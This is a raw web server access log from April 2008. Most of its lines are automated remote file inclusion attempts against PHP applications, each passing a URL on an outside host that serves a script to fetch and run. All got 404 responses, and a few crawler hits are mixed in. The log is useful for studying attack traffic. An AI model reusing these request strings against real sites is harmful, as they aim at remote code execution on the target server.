87.106.65.116 - - [01/Apr/2008:06:06:49 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:06:49 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:06:06:49 -0700] "GET /logs/access_080306.log/index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:06:49 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:06:50 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:06:59 -0700] "GET /logs/access_080119.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:07:24 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:07:53 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:08:08 -0700] "GET /logs/access_080313.log/index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:08:08 -0700] "GET /logs/access_080313.log/index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:08:09 -0700] "GET /logs/index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:08:09 -0700] "GET /logs/index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:08:12 -0700] "GET /logs/access_080306.log/index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:06:08:12 -0700] "GET /logs/access_080306.log/index1.php?x=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:06:08:16 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:06:08:16 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:06:08:16 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:08:18 -0700] "GET /logs/access_080305.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.85.12.121 - - [01/Apr/2008:06:08:31 -0700] "GET /logs//index.php?skin_file=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.119.240.143 - - [01/Apr/2008:06:08:31 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:08:44 -0700] "GET /logs/access_071227.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:08:44 -0700] "GET /logs/access_071227.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:08:44 -0700] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:08:44 -0700] "GET //administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:08:49 -0700] "GET /logs/access.log/common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.47.251 - - [01/Apr/2008:06:08:50 -0700] "GET /common/db.php?commonpath=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.29.87 - - [01/Apr/2008:06:09:14 -0700] "GET /bikes/dteel/140CANON/?S=D HTTP/1.0" 200 971 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:09:34 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:06:10:02 -0700] "GET /logs/access_080228.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:06:10:03 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:10:09 -0700] "GET /logs/access_080313.log//index.php?sourcedir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:10:09 -0700] "GET //index.php?sourcedir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:10:10 -0700] "GET /logs//index.php?sourcedir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.62 - - [01/Apr/2008:06:10:33 -0700] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:11:00 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:11:00 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:11:01 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.19.130 - - [01/Apr/2008:06:11:15 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:11:16 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.53 - - [01/Apr/2008:06:11:16 -0700] "GET /?M=A HTTP/1.0" 200 3346 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:11:16 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:11:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:11:25 -0700] "GET /logs/access_080223.log//index.php?sourcedir=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.21.91 - - [01/Apr/2008:06:11:31 -0700] "GET /funny/ HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.226 - - [01/Apr/2008:06:11:32 -0700] "GET /logs/access_080315.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:11:45 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:11:45 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:11:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.65.116 - - [01/Apr/2008:06:11:50 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.51.188 - - [01/Apr/2008:06:11:58 -0700] "GET /minamijewelry/?M=A HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.146.47.92 - - [01/Apr/2008:06:12:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:12:52 -0700] "GET /logs/access.log//common/db.php?commonpath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:12:53 -0700] "GET //common/db.php?commonpath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:12:53 -0700] "GET /logs//common/db.php?commonpath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.52 - - [01/Apr/2008:06:13:23 -0700] "GET /bikes/GPS/WeSTOC2008/?M=A HTTP/1.0" 200 842 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:13:39 -0700] "GET /index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:13:51 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:13:58 -0700] "GET /logs/access_080125.log//claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:13:58 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:13:59 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:14:02 -0700] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:14:05 -0700] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:14:20 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
118.127.2.108 - - [01/Apr/2008:06:14:30 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
118.127.2.108 - - [01/Apr/2008:06:14:30 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.98.60.90 - - [01/Apr/2008:06:14:34 -0700] "GET //skin/zero_vote/error.php?dir=http://tbcmd.110mb.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [01/Apr/2008:06:14:38 -0700] "GET /logs/access_080201.log//claroline/phpbb/page_tail.php?includePath=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:15:10 -0700] "GET /templatesmangoberyfooter.sample.php?Site_Path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:06:15:12 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.169 - - [01/Apr/2008:06:15:12 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:15:39 -0700] "GET /logs/access_080215.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
118.127.2.108 - - [01/Apr/2008:06:15:42 -0700] "GET /logs/bughttp://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
118.127.2.108 - - [01/Apr/2008:06:15:42 -0700] "GET /bughttp://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:06:16:13 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:06:16:14 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.40.45.130 - - [01/Apr/2008:06:16:14 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:06:16:30 -0700] "GET /logs/access_080228.log/index.php?option=com_restaurante&task=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:06:16:31 -0700] "GET /index.php?option=com_restaurante&task=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:16:33 -0700] "GET /logs/access_080125.log//tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:16:33 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:16:35 -0700] "GET /logs/access_080112.log//tools/send_reminders.php?noSet=0&includedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:16:51 -0700] "GET /logs/access_080127.log/index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:16:51 -0700] "GET /logs/index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:17:04 -0700] "GET /index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:17:08 -0700] "GET /logs/access_080207.log/index1.php?menu=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.31.232 - - [01/Apr/2008:06:17:54 -0700] "GET /davep/BigBear308/?N=A HTTP/1.0" 200 7530 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.206.242.35 - - [01/Apr/2008:06:18:54 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hamburg-per-soehn-lich.de/.r/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [01/Apr/2008:06:19:02 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [01/Apr/2008:06:19:02 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:02 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:03 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:03 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:07 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:10 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:10 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:10 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:10 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:10 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:14 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:14 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.77.203 - - [01/Apr/2008:06:19:14 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:06:19:22 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.195.77.225 - - [01/Apr/2008:06:19:22 -0700] "GET //index.php?sourcedir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:06:19:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:06:19:35 -0700] "GET /logs/access_071227.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.223 - - [01/Apr/2008:06:19:43 -0700] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://rich-alliance.com/cache/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.157.174.120 - - [01/Apr/2008:06:19:58 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.52.46 - - [01/Apr/2008:06:20:00 -0700] "GET /funny/?N=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:20:33 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:20:33 -0700] "GET /logs/access_080131.log//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:20:33 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:20:33 -0700] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:20:33 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.158 - - [01/Apr/2008:06:20:33 -0700] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.118.170.87 - - [01/Apr/2008:06:20:37 -0700] "GET /logs/access_080312.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:20:41 -0700] "GET /logs/access_080215.log/index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.151.103.27 - - [01/Apr/2008:06:20:41 -0700] "GET /logs/index1.php?site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
